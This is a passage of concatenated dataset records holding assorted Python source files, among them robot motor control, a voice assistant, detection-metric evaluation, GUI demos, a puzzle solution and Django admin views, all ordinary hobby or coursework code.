-180: #Turn left\n dart.motor(speed,'left', -1)\n dart.motor(speed,'right', 1)\n \n else: #Turn right\n dart.motor(speed,'left', 1)\n dart.motor(speed,'right', -1)\n \n time.sleep(0.1)\n\n\n\ndef setHeadingProp(dart, head, alpha = 2):\n headOk = False\n tolerance = 5\n \n if head > 180:\n head = 180\n if head < -180:\n head = -180\n \n maxSpeed = 130\n while not headOk:\n headMes = dart.get_angles()\n# headMes = dart.get_angles() + 2 * coef * random.random() - coef\n# print(headMes)\n headErr = head - headMes\n \n if (-180 < headErr < 180):\n delta = abs(headErr)\n else:\n delta = abs(headErr) - 180\n\n speed = delta * alpha\n if speed > maxSpeed:\n speed = maxSpeed\n \n if abs(headErr) < tolerance:\n headOk = True\n dart.motor(0,'left')\n dart.motor(0,'right')\n else:\n if (headErr > 0 and headErr < 180) or headErr < -180: #Turn left\n dart.motor(speed,'left', -1)\n dart.motor(speed,'right', 1)\n \n else: #Turn right\n dart.motor(speed,'left', 1)\n dart.motor(speed,'right', -1)\n \n time.sleep(0.1)\n print('fin set heading')\n \ndef giveHeadingProp(dart, head, alpha = 1.95):\n tolerance = 1\n \n if head > 180:\n head = 180\n if head < -180:\n head = -180\n \n maxSpeed = 130\n headMes = dart.get_angles()\n headErr = head - headMes\n \n if (-180 < headErr < 180):\n delta = abs(headErr)\n else:\n delta = abs(headErr) - 180\n\n speed = delta * alpha\n if speed > maxSpeed:\n speed = maxSpeed\n \n if abs(headErr) < tolerance:\n return 0, None\n else:\n if (headErr > 0 and headErr < 180) or headErr < -180:\n return speed, 'left'\n \n else: #Turn right\n return speed, 'right'\n \ndef goDartHeading(dart, head, speed, duration):\n setHeading(dart, head)\n t0 = time.time()\n t1 = time.time()\n while t1 - t0 < duration:\n left_speed = speed\n right_speed = speed\n turnSpeed, direction = giveHeadingProp(dart, head, speed/20)\n# print(turnSpeed)\n if direction:\n if direction == 'left':\n left_speed -= turnSpeed\n right_speed += turnSpeed\n elif direction == 
'right':\n left_speed += turnSpeed\n right_speed -= turnSpeed\n# print(left_speed,right_speed)\n dart.motor(left_speed,'left')\n dart.motor(right_speed,'right')\n \n t1 = time.time()\n \n dart.motor(0,'left')\n dart.motor(0,'right')\n# dart.stop()\n print('fin heading')\n\ndef goLineOdo (dart, speed, duration):\n t0 = 0\n t1 = 0\n t0 = time.time()\n \n while t1-t0 <= duration:\n \n dart.motor(speed, 'left')\n dart.motor(speed, 'right')\n \n leftOdo = dart.get_odometers()[0]\n rightOdo = dart.get_odometers()[1]\n errOdo = abs(leftOdo-rightOdo)\n \n if errOdo < 6:\n time.sleep(0.2)\n \n else:\n if leftOdo > rightOdo:\n dart.motor(speed-7, 'left')\n else:\n dart.motor(speed-7, 'right')\n print(errOdo) \n t1=time.time() \n\nif __name__ == \"__main__\":\n myDart = d.Dart()\n time.sleep(1)\n# t1 = time.time()\n# t2 = time.time()\n# while t2-t1<2:\n# setHeading(myDart, 180)\n# t2 = time.time()\n \n# setHeadingProp(myDart, 180, 1.92)\n goDartHeading(myDart, 90, 100, 3.5)\n goDartHeading(myDart, -90, 100, 7)\n goDartHeading(myDart, 90, 100, 3.5)\n# print(myDart.get_angles())\n\n time.sleep(2) # example do nothing for 2 seconds\n\n myDart.stop()\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"dart_cmd.py","file_name":"dart_cmd.py","file_ext":"py","file_size_in_byte":4835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"604642855","text":"import speech_recognition as sr\nfrom time import ctime\nimport webbrowser\nimport time\nimport playsound\nimport os\nfrom gtts import gTTS\nimport random\n\n\nr = sr.Recognizer()\n\ndef record_audio(ask=False):\n with sr.Microphone() as source:\n if ask:\n speak(ask)\n audio = r.listen(source)\n voice_data = ''\n try:\n voice_data = r.recognize_google(audio)\n except sr.UnknownValueError:\n speak('Sorry,I didnot get that')\n except sr.RequestError:\n speak('Sorry,my speech service is down!') \n return voice_data \n\n\ndef speak(audio_string):\n tts = gTTS(text=audio_string,lang='en')\n r = random.randint(1,10000000)\n audio_file = 'audio-' + str(r) + '.mp3'\n tts.save(audio_file)\n playsound.playsound(audio_file)\n print(audio_string)\n os.remove(audio_file)\n\ndef respond(voice_data):\n if 'what is your name' in voice_data:\n speak('My name is CzN')\n\n if 'what time is it' in voice_data:\n speak(ctime())\n\n if 'search' in voice_data:\n search = record_audio('What do you want to search for') \n url = 'https://google.com/search?q=' + search\n webbrowser.get().open(url)\n speak('herspeake is what I found')\n\n if 'find location' in voice_data:\n location = record_audio('What do you want to search for') \n url = 'https://google.nl/maps/place/' + location + '/&'\n webbrowser.get().open(url)\n speak('here is what I found') \n\n if 'exit' in voice_data:\n exit() \n\n\ntime.sleep(1)\nspeak('How can I help you?')\n\nwhile 1:\n voice_data = record_audio()\n respond(voice_data)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"558564687","text":"\"\"\"\r\n Имя проекта: practicum_1\r\n Номер версии: 1.0\r\n Имя файла: 47.ру\r\n Автор: 2020 © А.И. 
Баскаков, Челябинск\r\n Лицензия использования: CC BY-NC 4.0 (https://creativecommons.org/licenses/by-nc/4.0/deed.ru)\r\n Дата создания: 16/12/2020\r\n Описание: Задача 47.\r\n #версия Python: 3.9\r\n\"\"\"\r\nimport random\r\n\r\nN = int(input(\"Количество элементов массива\"))\r\nB = int(input(\"Элемент массива 1\"))\r\nC = int(input(\"Элемент массива 2\"))\r\nA = [random.randint(-10, 10) for i in range(0, N)]\r\n\r\nprint(A)\r\n\r\nC = C + 1\r\ndel A[B:C]\r\n\r\nprint(A)\r\n","sub_path":"35.py","file_name":"35.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"290879220","text":"from game import Play, Discard, Clue, Move\nfrom game import Card, Tokens, Rules\nfrom typing import NamedTuple, List, Tuple\n\n\ndef oracle_player(state: None, log: List[NamedTuple], hands: List[List[Card]],\n rules: Rules, tokens: Tokens, slots: List[int],\n discard_pile: List[List[int]]) -> Tuple[None, Move, str]:\n \"\"\"\n Tsvika and Ofer's oracle player\n \"\"\"\n my_id = len(log) % len(hands)\n my_hand = hands[my_id]\n if my_hand[0].data is None:\n raise RuntimeError(\"I need to be omniscient\")\n\n # play something playable\n playable_card = None\n for card in my_hand:\n if slots[card.data.suit] == card.data.rank:\n if playable_card is None or playable_card.data.rank < card.data.rank:\n playable_card = card\n if playable_card is not None:\n return state, Play.create(playable_card.id), 'playable'\n\n def get_card_to_discard():\n # discard already played\n for card in my_hand:\n if slots[card.data.suit] > card.data.rank:\n return card.id, 'low'\n # discard unreachable\n for suit in range(rules.suits):\n max_rank_in_suit = None\n for rank in range(len(rules.ranks)):\n left_in_rank = rules.ranks[rank] - discard_pile[suit][rank]\n if rank >= slots[suit] and left_in_rank == 0:\n max_rank_in_suit = rank\n break\n if max_rank_in_suit:\n for card in my_hand:\n if card.data.suit == suit and card.data.rank > max_rank_in_suit:\n return card.id, 'high'\n # discard duplicates in own hand\n knowns = [card.data for card in my_hand]\n if len(set(knowns)) < len(knowns):\n for i, known in enumerate(knowns):\n for known2 in knowns[i+1:]:\n if known == known2:\n return my_hand[i].id, 'dup'\n # discard duplicates with others\n knowns = [card.data for card in my_hand]\n for hand in hands[:my_id]+hands[my_id+1:]:\n knowns2 = [card.data for card in hand]\n if len(set(knowns+knowns2)) < len(knowns)+len(set(knowns2)):\n for i, known in enumerate(knowns):\n for known2 in knowns2:\n if known == known2:\n return my_hand[i].id, 'dup2'\n return None, ''\n\n # discard something discardable\n if tokens.clues < rules.max_tokens.clues:\n card, note = get_card_to_discard()\n if card is not None:\n return state, Discard.create(card), 'pass/d/' + note\n\n # nothing useful to do\n # try to pass with useless clue\n if tokens.clues > 0:\n player = (my_id + 1) % len(hands)\n if hands[player]:\n return state, Clue.create(player, 'suit', hands[player][0].data.suit), 'pass/c'\n\n # try to pass with false play\n if tokens.lives > 1:\n card, note = get_card_to_discard()\n if card is not None:\n return state, Play.create(card), 'pass/p/' + note\n\n # you have to throw something useful. 
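(no safe discard was found, no clue tokens are left and only one life remains);\n    # 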
try the farthest from the suit\n # look for an expandable card\n diff = None\n throw = None\n for card in my_hand:\n card_diff = card.data.rank - slots[card.data.suit]\n if diff is None or card_diff > diff:\n if rules.ranks[card.data.rank] - discard_pile[card.data.suit][card.data.rank] > 1:\n diff = card_diff\n throw = card\n note = ''\n # look for a non expandable card, if you must (BOO!)\n if diff is None:\n note = '/bad'\n for card in my_hand:\n card_diff = card.data.rank - slots[card.data.suit]\n if diff is None or card_diff > diff:\n diff = card_diff\n throw = card\n assert throw is not None\n\n # throw by discard\n if tokens.clues < rules.max_tokens.clues:\n return state, Discard.create(throw.id), 'throw/d' + note\n\n # throw by false play\n return state, Play.create(throw.id), 'throw/p' + note\n","sub_path":"players/oracle.py","file_name":"oracle.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"157457246","text":"def twonums_sum(m, lst):\n for i in range(0, len(lst)):\n for j in range(0, len(lst)):\n if lst[i] + lst[j] == int(m):\n return i, j\n else:\n return -1\n\n\nlist1 = [1,4,5,6,7,8,9,10,11,12,13,15,18,19,20,21,29,34,54,65]\nn = input()\nif twonums_sum(n, list1) == -1:\n print('not found')\nelse:\n print(twonums_sum(n, list1))\n\n","sub_path":"人工智能程序设计/class/3.28/3.28_4.py","file_name":"3.28_4.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"78412028","text":"import numpy as np\n\n\ndef iou(boxA,boxB):\n # For each prediction, compute its iou over all the boxes in that frame\n boxA = list(filter(None, boxA))#remove the parked cars bbox\n if boxA == []:\n return None\n boxA = np.array(boxA)\n x11, y11, x12, y12 = np.split(boxA, 4, axis=1)\n x21, y21, x22, y22 = np.split(boxB, 4, axis=1)\n\n # Calculate the intersection in the bboxes\n xmin = np.maximum(x11, np.transpose(x21))\n ymin = np.maximum(y11, np.transpose(y21))\n xmax = np.minimum(x12, np.transpose(x22))\n ymax = np.minimum(y12, np.transpose(y22))\n w = np.maximum(xmax - xmin + 1.0, 0.0)\n h = np.maximum(ymax - ymin + 1.0, 0.0)\n intersection = w * h\n\n # Union\n areaboxA = (x12 - x11 + 1.0) * (y12 - y11 + 1.0)\n areaboxB = (x22 - x21 + 1.0) * (y22 - y21 + 1.0)\n union = areaboxA + np.transpose(areaboxB) - intersection\n\n iou = intersection / union\n\n\n return iou\n\n\n\ndef ap_score(gt,pred,num_bboxes,ovthresh=0.5):\n\n\n # go down dets and mark TPs and FPs\n num_frames = gt[-1]['frame']\n nd = num_bboxes\n tp = np.zeros(nd)\n fp = np.zeros(nd)\n idx_bbox = 0\n iouList = []\n initFrame = pred[0]['frame']\n #gt = cutGT(gt, initFrame)\n for f in range(num_frames+1-initFrame):\n bbgt = gt[f]['bbox']\n bboxes_pred = pred[f]['bbox']\n for box in bboxes_pred:\n bbpred = np.array([box])\n if bbpred[0] is not None:\n iouScore = iou(bbgt,bbpred)\n if iouScore is None:\n fp[idx_bbox] = 1.0\n else:\n maxScore = max(iouScore)\n index = np.argmax(iouScore)\n iouList.append(maxScore)\n\n if maxScore > ovthresh:\n if not gt[f]['is_detected'][index]:\n # We have detected an existing bbox in the gt\n gt[f]['is_detected'][index] = True\n tp[idx_bbox] = 1.0\n else:\n fp[idx_bbox] = 1.0\n else:\n fp[idx_bbox] = 1.0\n else:\n iouScore = iou(bbgt, bbpred)\n if iouScore is None:\n nobbox = 1\n else:\n fp[idx_bbox] = 1.0\n\n idx_bbox += 1\n # compute precision recall\n fp = np.cumsum(fp)\n tp = np.cumsum(tp)\n rec = tp / float(idx_bbox)\n # 
avoid divide by zero in case the first detection matches a difficult\n # ground truth\n prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n\n # compute AP with the 11 point metric\n ap = 0.0\n for t in np.arange(0.0, 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.0\n\n return rec, prec, ap, np.mean(iouList)\n\n\n\ndef VOC_ap_score(gt,pred,num_bboxes,ovthresh=0.5):\n\n\n def sort_key_def(elem):\n return elem[2]\n\n # Sort by confidence\n pred_BB = []\n for i in range(len(pred)):\n for i_bb in range(len(pred[i]['bbox'])):\n pred_BB.append([i, pred[i]['bbox'][i_bb], pred[i]['score'][i_bb]])\n pred_bb_sorted = sorted(pred_BB, reverse=True, key=sort_key_def)\n\n meanIoU = np.zeros(len(pred))\n\n # go down dets and mark TPs and FPs\n nd = num_bboxes\n tp = np.zeros(nd)\n fp = np.zeros(nd)\n\n for br in range(len(pred_bb_sorted)):\n #for box in bboxes_pred:\n frame_id = pred_bb_sorted[br][0]\n bbpred = np.array([pred_bb_sorted[br][1]]).astype(float)\n bbgt = gt[frame_id]['bbox'].astype(float)\n\n iouScore = iou(bbgt,bbpred)\n maxScore = max(iouScore)\n meanIoU[frame_id] += maxScore[0]\n index = np.argmax(iouScore)\n\n if maxScore > ovthresh:\n if not gt[frame_id]['is_detected'][index]:\n # We have detected an existing bbox in the gt\n gt[frame_id]['is_detected'][index] = True\n tp[br] = 1.0\n else:\n fp[br] = 1.0\n else:\n fp[br] = 1.0\n\n fp = np.cumsum(fp)\n tp = np.cumsum(tp)\n\n # compute precision recall\n rec = tp / float(num_bboxes)\n # avoid divide by zero in case the first detection matches a difficult\n prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n\n # compute AP with the 11 point metric\n ap = 0.0\n for t in np.arange(0.0, 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.0\n\n for i in range(len(meanIoU)):\n meanIoU[i] = meanIoU[i] / len(pred[i]['bbox'])\n\n return rec, prec, ap, meanIoU\n# # Hem de modificar la funció aquesta per a que usar-la amb les nostres dades (és el mAP calculat amb Detectron2)\n# #https://github.com/facebookresearch/detectron2/blob/master/detectron2/evaluation/pascal_voc_evaluation.py\n# def voc_eval(detpath, annopath, imagesetfile, classname, ovthresh=0.5, use_07_metric=False):\n# \"\"\"rec, prec, ap = voc_eval(detpath,\n# annopath,\n# imagesetfile,\n# classname,\n# [ovthresh],\n# [use_07_metric])\n# Top level function that does the PASCAL VOC evaluation.\n# detpath: Path to detections\n# detpath.format(classname) should produce the detection results file.\n# annopath: Path to annotations\n# annopath.format(imagename) should be the xml annotations file.\n# imagesetfile: Text file containing the list of images, one image per line.\n# classname: Category name (duh)\n# [ovthresh]: Overlap threshold (default = 0.5)\n# [use_07_metric]: Whether to use VOC07's 11 point AP computation\n# (default False)\n# \"\"\"\n# # assumes detections are in detpath.format(classname)\n# # assumes annotations are in annopath.format(imagename)\n# # assumes imagesetfile is a text file with each line an image name\n#\n# # first load gt\n# # read list of images\n# with PathManager.open(imagesetfile, \"r\") as f:\n# lines = f.readlines()\n# imagenames = [x.strip() for x in lines]\n#\n# # load annots\n# recs = {}\n# for imagename in imagenames:\n# recs[imagename] = parse_rec(annopath.format(imagename))\n#\n# # extract gt objects for this class\n# class_recs = {}\n# npos = 0\n# for imagename in imagenames:\n# R = [obj for obj in recs[imagename] if obj[\"name\"] 
== classname]\n# bbox = np.array([x[\"bbox\"] for x in R])\n# difficult = np.array([x[\"difficult\"] for x in R]).astype(np.bool)\n# # difficult = np.array([False for x in R]).astype(np.bool) # treat all \"difficult\" as GT\n# det = [False] * len(R)\n# npos = npos + sum(~difficult)\n# class_recs[imagename] = {\"bbox\": bbox, \"difficult\": difficult, \"det\": det}\n#\n# # read dets\n# detfile = detpath.format(classname)\n# with open(detfile, \"r\") as f:\n# lines = f.readlines()\n#\n# splitlines = [x.strip().split(\" \") for x in lines]\n# image_ids = [x[0] for x in splitlines]\n# confidence = np.array([float(x[1]) for x in splitlines])\n# BB = np.array([[float(z) for z in x[2:]] for x in splitlines]).reshape(-1, 4)\n#\n# # sort by confidence\n# sorted_ind = np.argsort(-confidence)\n# BB = BB[sorted_ind, :]\n# image_ids = [image_ids[x] for x in sorted_ind]\n#\n# # go down dets and mark TPs and FPs\n# nd = len(image_ids)\n# tp = np.zeros(nd)\n# fp = np.zeros(nd)\n# for d in range(nd):\n# R = class_recs[image_ids[d]]\n# bb = BB[d, :].astype(float)\n# ovmax = -np.inf\n# BBGT = R[\"bbox\"].astype(float)\n#\n# if BBGT.size > 0:\n# # compute overlaps\n# # intersection\n# ixmin = np.maximum(BBGT[:, 0], bb[0])\n# iymin = np.maximum(BBGT[:, 1], bb[1])\n# ixmax = np.minimum(BBGT[:, 2], bb[2])\n# iymax = np.minimum(BBGT[:, 3], bb[3])\n# iw = np.maximum(ixmax - ixmin + 1.0, 0.0)\n# ih = np.maximum(iymax - iymin + 1.0, 0.0)\n# inters = iw * ih\n#\n# # union\n# uni = (\n# (bb[2] - bb[0] + 1.0) * (bb[3] - bb[1] + 1.0)\n# + (BBGT[:, 2] - BBGT[:, 0] + 1.0) * (BBGT[:, 3] - BBGT[:, 1] + 1.0)\n# - inters\n# )\n#\n# overlaps = inters / uni\n# ovmax = np.max(overlaps)\n# jmax = np.argmax(overlaps)\n#\n# if ovmax > ovthresh:\n# if not R[\"difficult\"][jmax]:\n# if not R[\"det\"][jmax]:\n# tp[d] = 1.0\n# R[\"det\"][jmax] = 1\n# else:\n# fp[d] = 1.0\n# else:\n# fp[d] = 1.0\n#\n# # compute precision recall\n# fp = np.cumsum(fp)\n# tp = np.cumsum(tp)\n# rec = tp / float(npos)\n# # avoid divide by zero in case the first detection matches a difficult\n# # ground truth\n# prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n# ap = voc_ap(rec, prec, use_07_metric)\n#\n# return rec, prec, ap\n","sub_path":"week2/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":9227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"262312831","text":"# pesquisa.py\n\nimport sys\nfrom PySide2.QtWidgets import (QApplication, QWidget, QLabel, \n QPushButton, QPushButton, QCheckBox, \n QButtonGroup, QHBoxLayout, QVBoxLayout)\nfrom PySide2.QtGui import QFont\n\nclass Pesquisa(QWidget):\n def __init__(self):\n super().__init__()\n self.iniciaUI()\n\n def iniciaUI(self):\n \"\"\"\n Inicializa a janela e mostra seu conteuda na tela\n \"\"\"\n\n self.setGeometry(100,100, 400, 230)\n self.setWindowTitle(\"Pesquisa de Opinião\")\n self.displayWidgets()\n\n self.show()\n\n def displayWidgets(self):\n \"\"\"\n Configura os widgets da app\n \"\"\"\n\n titl_lbl = QLabel(\"Pizzaria Pinocchio\")\n titl_lbl.setFont(QFont(\"Arial\", 17))\n qust_lbl = QLabel(\"Como você classificaria o atendimento hoje?\")\n\n titl_hbox = QHBoxLayout()\n titl_hbox.addStretch()\n titl_hbox.addWidget(titl_lbl)\n titl_hbox.addStretch()\n\n escala = [\"Insatisfeito\", \"Médio\", \"Satisfeito\"]\n\n escala_hbox = QHBoxLayout()\n escala_hbox.setSpacing(60)\n\n escala_hbox.addStretch()\n for eval in escala:\n eval_lbl = QLabel(eval, self)\n escala_hbox.addWidget(eval_lbl)\n 
escala_hbox.addStretch()\n\n btng_hbox = QHBoxLayout()\n btng_hbox.setSpacing(100)\n escala_bgrp = QButtonGroup(self)\n btng_hbox.addStretch()\n for btn in range(len(escala)):\n eval_chkb = QCheckBox(str(btn), self)\n btng_hbox.addWidget(eval_chkb)\n escala_bgrp.addButton(eval_chkb)\n btng_hbox.addStretch()\n\n escala_bgrp.buttonClicked.connect(self.checkboxClicked)\n\n close_btn = QPushButton(\"Fechar\", self)\n close_btn.clicked.connect(self.close)\n\n vbox = QVBoxLayout()\n vbox.addLayout(titl_hbox)\n vbox.addWidget(qust_lbl)\n vbox.addStretch(1)\n vbox.addLayout(escala_hbox)\n vbox.addLayout(btng_hbox)\n vbox.addStretch(2)\n vbox.addWidget(close_btn)\n\n self.setLayout(vbox)\n\n\n def checkboxClicked(self, chkb):\n \"\"\"\n Imprime o texto do checkbox selecionado\n \"\"\"\n\n print(\"{} Selecionado.\",format(chkb.text()))\n\n#Executando o App\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = Pesquisa()\n sys.exit(app.exec_())\n\n","sub_path":"EC_Pesquisa/pesquisa.py","file_name":"pesquisa.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"49698982","text":"# File: T (Python 2.3)\n\nimport unittest\nfrom ipl.types.Bunch import Bunch\n\ndef accessBadMember():\n data = Bunch(a = 1, b = 2, c = 3)\n return data.d\n\n\nclass TestBunch(unittest.TestCase):\n \n def testBunch(self):\n bearName = 'Edward'\n myYear = 1066\n b = Bunch(bear = bearName, year = myYear)\n self.failUnless(b.bear == bearName)\n self.failUnless(b.year == myYear)\n\n \n def testBadMember(self):\n self.assertRaises(AttributeError, accessBadMember)\n\n \n def testAssignment(self):\n myFruit = 'Loganberry'\n food = Bunch(yoghurt = 'Raspberry', cheese = 'Brie')\n food.fruit = myFruit\n self.failUnless(food.fruit == myFruit, 'Testing assignment')\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"Server/ipl/types/tests/TestBunch.py","file_name":"TestBunch.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"294060181","text":"\n### one code one day\n### 2020/04/17\n### leetcode 394 字符串解码\n\n### 栈思想\ndef decodeString(self, s: str) -> str:\n res = \"\"\n stack = []\n for char in s:\n if(char == ']'):\n ### 找字符串\n temp_str = \"\"\n while(stack[-1] != '['):\n temp_str = stack.pop() + temp_str\n stack.pop()\n ### 找个数\n temp_num = \"\"\n while(len(stack) >= 1 and stack[-1] >= '0' and stack[-1] <= '9'):\n temp_num = stack.pop() + temp_num\n ### 再进栈\n for ch in temp_str * int(temp_num):\n stack.append(ch)\n else:\n stack.append(char)\n return \"\".join(stack)\n\n### 2020/05/28\n### 递归法\ndef decodeString(self, s: str) -> str:\n def find(start, end):\n count = 0\n for i in range(start, end+1):\n if(s[i] == '['):\n count += 1\n elif(s[i] == ']'):\n count -= 1\n if(count == 0):\n return i\n\n def decode(start, end):\n res = ''\n i = start\n while(i <= end):\n if('0' <= s[i] <= '9'):\n strNum = ''\n while('0'<=s[i]<='9'):\n strNum += s[i]\n i += 1\n idx = find(i, end)\n res = res + int(strNum) * decode(i+1, idx-1)\n i = idx + 1\n else:\n res += s[i]\n i += 1\n return res\n return decode(0, len(s)-1)\n","sub_path":"栈/decodeString.py","file_name":"decodeString.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"470847531","text":"from tkinter import *\nfrom tkinter import ttk\n\n\nwindow=Tk()\n\nlastx, lasty = 0, 
0\n\ndef xy(event):\n global lastx, lasty\n lastx, lasty = event.x, event.y\n\ndef punto():\n global lastx,lasty\n canvasD.cr\n\nwindow.columnconfigure(0, weight=1)\nwindow.rowconfigure(0, weight=1)\ncanvasD=Canvas(window,relief=RAISED,scrollregion=(0, 0, 1000, 1000))\ncanvasD.pack()\ncanvasD.configure(background=\"blue\")\n\ncanvasC=Canvas(window,relief=RAISED)\ncanvasC.pack()\ncanvasC.configure(background=\"red\")\npoints = [325, 0, 300,25, 350, 25]\nuparrow=canvasC.create_polygon(points,fill=\"black\")\n\npoints2 = [325, 55, 300,30, 350, 30]\ndownarrow=canvasC.create_polygon(points2,fill=\"black\")\n\npoints3=[0, 25, 25,0, 25, 50]\nleftarrow=canvasC.create_polygon(points3,fill=\"black\")\n\npoints4=[55, 25, 30,0, 30, 50]\nrightarrow=canvasC.create_polygon(points4,fill=\"black\")\n\ncanvasC.bind(\"\", lambda e:print(e.x,e.y))\nwindow.update()\nwindow.maxsize(500,340)\nwindow.minsize(300,340)\nwindow.mainloop()\n\n","sub_path":"untitled/telesketch/telesketch.py","file_name":"telesketch.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"541533215","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpRequest\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils import simplejson\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import Http404\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.paginator import Paginator\nfrom django.conf import settings\nfrom django.core.exceptions import PermissionDenied\nimport datetime\nfrom datetime import date\nfrom django.utils import dateformat\nfrom django.utils import timezone\nfrom django.core.cache import cache\n\nfrom theriver.utils import *\nfrom theriver.models import *\nfrom adminka.forms import *\nimport pushwoosh\n\n\npush = pushwoosh.Pushwoosh(settings.PUSHWOOSH_LOGIN, settings.PUSHWOOSH_PASS, settings.PUSHWOOSH_APP_ID)\n\n# pyapns_wrapper = PyapnsWrapper(settings.APNS_HOST,\n# settings.APP_ID,\n# settings.APNS_CERTIFICATE_LOCATION)\n\n# def send_notifications(message):\n# \tfor token in DeviceToken.objects.all():\n# \t\tpyapns_wrapper.notify(token.token, message)\n\ndef site_admin_only(function):\n\tdef _inner(request, *args, **kwargs):\n\t\tif request.user.is_authenticated():\n\t\t\tif not request.user.is_site_admin or not request.user.is_admin:\n\t\t\t\treturn HttpResponseRedirect('/') \n\t\t\treturn function(request, *args, **kwargs)\n\t\telse:\n\t\t\treturn HttpResponseRedirect('/')\n\treturn _inner\n\n\n@site_admin_only\ndef index_adminka(request, template_name='adminka/index.html'):\n\treturn render_to_response(template_name, context_instance=RequestContext(request))\n\n@site_admin_only\ndef all_events(request, type_events, template_name='adminka/events/events.html'):\n\tif type_events == \"no_complete\":\n\t\tall_events = Event.objects.filter(is_removed=False).filter(is_completed=False).order_by('-date_create')\n\telif type_events == \"complete\":\n\t\tall_events = Event.objects.filter(is_removed=False).filter(is_completed=True).order_by('-date_create')\n\telif type_events == \"curent_month\":\n\t\tnow = datetime.datetime.now()\n\t\tall_events = 
Event.objects.filter(is_removed=False).filter(start_date__year=now.year, start_date__month=now.month).order_by('-date_create')\n\telse:\n\t\tall_events = Event.objects.filter(is_removed=False).order_by('-date_create')\n\treturn render_to_response(template_name, {\"all_events\":all_events}, context_instance=RequestContext(request))\n\n@site_admin_only\ndef event(request, id, template_name='adminka/events/event.html'):\n\ttry:\n\t\tevent = Event.objects.get(id=int(id))\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\tif request.method == 'POST':\n\t\tform = EventForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\t\t\tlogo \t\t= form.cleaned_data['logo']\n\t\t\ttitle \t\t= form.cleaned_data['title']\n\t\t\tstart_date\t= form.cleaned_data['start_date']\n\t\t\tplace \t\t= form.cleaned_data['place']\n\t\t\ttext \t\t= form.cleaned_data['text']\n\t\t\tis_completed = form.cleaned_data['is_completed']\n\t\t\tgroup_id\t= form.cleaned_data['group_id']\n\n\t\t\tif logo:\n\t\t\t\tlogo = Photo.objects.create(img=logo)\n\t\t\t\tevent.material.logo = logo\n\t\t\tif is_completed:\n\t\t\t\tevent.is_completed = True\n\t\t\telse:\n\t\t\t\tevent.is_completed = False\n\n\t\t\ttry:\n\t\t\t\tgroup_id = EventsGroup.objects.get(id=group_id)\n\t\t\texcept ObjectDoesNotExist:\n\t\t\t\traise Http404\n\n\t\t\tevent.material.title = title\n\t\t\tevent.start_date = start_date\n\t\t\tevent.end_date = start_date\n\t\t\tevent.place = place\n\t\t\tevent.material.text = text\n\t\t\tevent.event_group = group_id\n\n\t\t\tevent.material.save()\n\t\t\tevent.save()\n\t\t\treturn HttpResponseRedirect(\"/adminka/events/\")\n\telse:\t\n\t\tform = EventForm()\n\tgroups = EventsGroup.objects.all()\n\treturn render_to_response(template_name, {\"event\":event, \"form\":form, \"groups\":groups}, context_instance=RequestContext(request))\n\n\n@site_admin_only\ndef subscribe_events(request, id, template_name='adminka/events/subscribe_events.html'):\n\ttry:\n\t\tevent = Event.objects.get(id=int(id))\n\texcept ObjectDoesNotExist:\n\t\traise Http404\n\treturn render_to_response(template_name, {\"event\":event}, context_instance=RequestContext(request))\n\n@site_admin_only\ndef event_add(request, template_name='adminka/events/add_events.html'):\n\tif request.method == 'POST':\n\t\tform = EventForm(data=request.POST, files=request.FILES)\n\t\tif form.is_valid():\n\n\t\t\tlogo \t\t= form.cleaned_data['logo']\n\t\t\ttitle \t\t= form.cleaned_data['title']\n\t\t\tstart_date\t= form.cleaned_data['start_date']\n\t\t\tplace \t\t= form.cleaned_data['place']\n\t\t\ttext \t\t= form.cleaned_data['text']\n\t\t\tis_completed = form.cleaned_data['is_completed']\n\t\t\tgroup_id\t= form.cleaned_data['group_id']\n\n\t\t\tif is_completed:\n\t\t\t\tis_completed = True\n\t\t\telse:\n\t\t\t\tis_completed = False\n\n\t\t\tlike = MateriaLike.objects.create()\n\t\t\tif logo:\n\t\t\t\tlogo = Photo.objects.create(img=logo)\n\t\t\t\tmaterial = Materials.objects.create(logo=logo, title=title, text=text, player=request.user, 